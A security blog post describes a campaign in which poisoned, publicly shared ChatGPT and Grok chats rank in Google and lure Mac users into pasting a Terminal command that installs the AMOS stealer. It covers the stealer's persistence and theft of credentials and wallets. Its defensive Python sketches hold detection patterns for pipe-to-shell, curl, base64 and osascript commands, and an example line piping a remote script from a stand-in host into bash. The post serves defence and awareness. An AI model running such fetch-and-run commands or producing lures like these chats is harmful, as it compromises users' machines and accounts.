Here’s a novel malware delivery vector that nobody saw coming. Attackers are weaponizing publicly shared conversations with AI assistants like ChatGPT and Grok to deliver the AMOS stealer to Mac users. The kicker? These poisoned AI chats are ranking at the top of Google search results for completely innocent queries like “How to free up disk space on Mac”.

What you thought was helpful advice from your trusted silicon friend turns out to be a credential-stealing trap. Life definitely did not prepare regular users for this one.

On December 5, 2025, Huntress researchers investigated an Atomic macOS Stealer (AMOS Stealer) alert with an unusual origin. No phishing email. No malicious installer. No right-click-to-bypass-Gatekeeper shenanigans. The victim had simply searched Google for “Clear disk space on macOS.”



At the top of the results sat two highly ranked links, one to a ChatGPT conversation and another to a Grok chat. Both platforms are legitimate. Both conversations looked authentic, with professional formatting, numbered steps, and even reassuring language like “safely removes” and “does not touch your personal data.”

But instead of legitimate cleanup instructions (surprise, surprise), the chats delivered a ClickFix-style attack: they coax the user into copying a command and pasting it into Terminal, which kicks off the infection. To the average user, the whole thing looks completely convincing. Why wouldn’t you trust Google and your AI assistant? Surely they won’t let you down.

Grok’s version at least displays a banner warning about custom instructions—but that means nothing to someone who just wants to clear their disk space.

Huntress confirmed this isn’t a one-off case. They reproduced poisoned results for “how to clear data on iMac,” “clear system data on iMac,” and “free up storage on Mac.” Multiple AI conversations are surfacing organically through standard search terms, each pointing victims toward the same multi-stage macOS stealer. This is a coordinated SEO poisoning campaign.

Traditional malware delivery requires users to override their instincts: open unknown files, bypass Gatekeeper, click through security warnings. This attack? It only needs you to search, click a trusted-looking result, and paste a command into Terminal. No manual downloads. No warnings. No red flags.

Users aren’t being careless—they’re following what appears to be legitimate advice from a trusted AI platform, served up by a search engine they use daily, for a task that actually does involve Terminal commands. The attack exploits trust in search engines, trust in AI platforms (chatgpt.com and grok.com are real domains everyone knows), trust in the familiar ChatGPT formatting, and the normalized behavior of copying Terminal commands from authoritative sources.
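If you do copy commands from the web, a quick sanity check before pasting helps. Below is a minimal defensive sketch in Python. It assumes the malicious command looks like a typical ClickFix one-liner: remote content piped into a shell, a base64-decoded payload, AppleScript, or a request for sudo. The `red_flags` helper and its patterns are hypothetical heuristics chosen for illustration, not indicators taken from the Huntress report. An empty result does not mean a command is safe.

```python
from __future__ import annotations

import re

# Hypothetical red flags for copy-paste Terminal one-liners. These patterns are
# illustrative assumptions, not published indicators for this campaign.
RED_FLAGS = {
    "pipes content into a shell": re.compile(r"\|\s*(sudo\s+)?(bash|zsh|sh)\b"),
    "fetches remote content": re.compile(r"\b(curl|wget)\b"),
    "decodes a base64 payload": re.compile(r"\bbase64\s+(-d|-D|--decode)\b"),
    "runs AppleScript": re.compile(r"\bosascript\b"),
    "asks for root privileges": re.compile(r"\bsudo\b"),
}


def red_flags(command: str) -> list[str]:
    """Return the description of every red flag found in `command`."""
    return [reason for reason, pattern in RED_FLAGS.items() if pattern.search(command)]
```

For example, `red_flags("curl -fsSL https://example.invalid/cleanup.sh | bash")` returns `["pipes content into a shell", "fetches remote content"]`. A harmless disk-usage check like `red_flags("du -sh ~/Library/Caches")` returns an empty list. The heuristic is deliberately noisy, because a false alarm costs a second look and a miss costs your Keychain.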

What AMOS Stealer Actually Does

Once executed, the malware kicks off a multi-stage infection. First, it prompts for your “System Password” via a fake dialog—not even the real macOS authentication UI—and silently validates it using Directory Services. Then it uses that password with sudo to gain root access.

For persistence, it drops a hidden .helper binary and a LaunchDaemon that respawns the malware every second if killed. If you have Ledger Wallet or Trezor Suite installed, it overwrites them with trojanized versions designed to steal your seed phrases. Finally, it exfiltrates browser credentials, cookies, Keychain data, and cryptocurrency wallets from Electrum, Exodus, MetaMask, Coinbase, and more.
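The persistence mechanism can be hunted for. Below is a minimal Python sketch that assumes the LaunchDaemon sits in the standard `/Library/LaunchDaemons` directory and launches a dot-prefixed executable like the hidden `.helper` binary. This write-up doesn’t give the exact file paths or plist names, so the `hidden_program` and `suspicious_daemons` helpers are hypothetical heuristics. A hit is a lead to investigate, not proof of infection.

```python
from __future__ import annotations

import os
import plistlib
from pathlib import Path
from xml.parsers.expat import ExpatError


def hidden_program(job: dict) -> str | None:
    """Return the job's executable if its file name is hidden (starts with '.')."""
    # launchd runs "Program" if present, otherwise the first ProgramArguments entry.
    exe = job.get("Program")
    if exe is None:
        args = job.get("ProgramArguments") or []
        exe = args[0] if args else None
    if isinstance(exe, str) and os.path.basename(exe).startswith("."):
        return exe
    return None


def suspicious_daemons(directory: str = "/Library/LaunchDaemons") -> list[tuple[str, str]]:
    """List (plist name, detail) for launchd jobs that run a hidden executable.

    Hypothetical heuristic: the default directory is an assumption, and a
    missing directory simply yields no findings.
    """
    findings = []
    for plist_file in sorted(Path(directory).glob("*.plist")):
        try:
            with plist_file.open("rb") as fh:
                job = plistlib.load(fh)
        except (OSError, ValueError, ExpatError):
            continue  # unreadable or malformed plist: skip rather than crash
        if not isinstance(job, dict):
            continue
        exe = hidden_program(job)
        if exe is None:
            continue
        detail = exe
        if job.get("KeepAlive"):
            # KeepAlive tells launchd to relaunch the job (always, or under the listed conditions).
            detail += " (KeepAlive set)"
        findings.append((plist_file.name, detail))
    return findings


if __name__ == "__main__":
    for name, detail in suspicious_daemons():
        print(f"{name}: {detail}")
```

Checking the executable’s name rather than a specific plist label keeps the sketch useful if the campaign renames its files. The trade-off is that it misses persistence that doesn’t hide its binary.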

The password prompt doesn’t even look like macOS—it’s just a script asking politely for your password. And people enter it anyway, because they trust where the instructions came from.

ClickFix Keeps Getting Creative

This campaign adds another impressive example to the ClickFix portfolio. The technique has evolved from fake CAPTCHA prompts and browser updates to now exploiting our relationship with AI assistants. Malware no longer needs to masquerade as legitimate software—it just needs to masquerade as help.

All of this is fascinating from a security research perspective, but honestly, you have to feel sorry for regular users—nobody prepared them for their trusted search engine and AI assistant teaming up against them.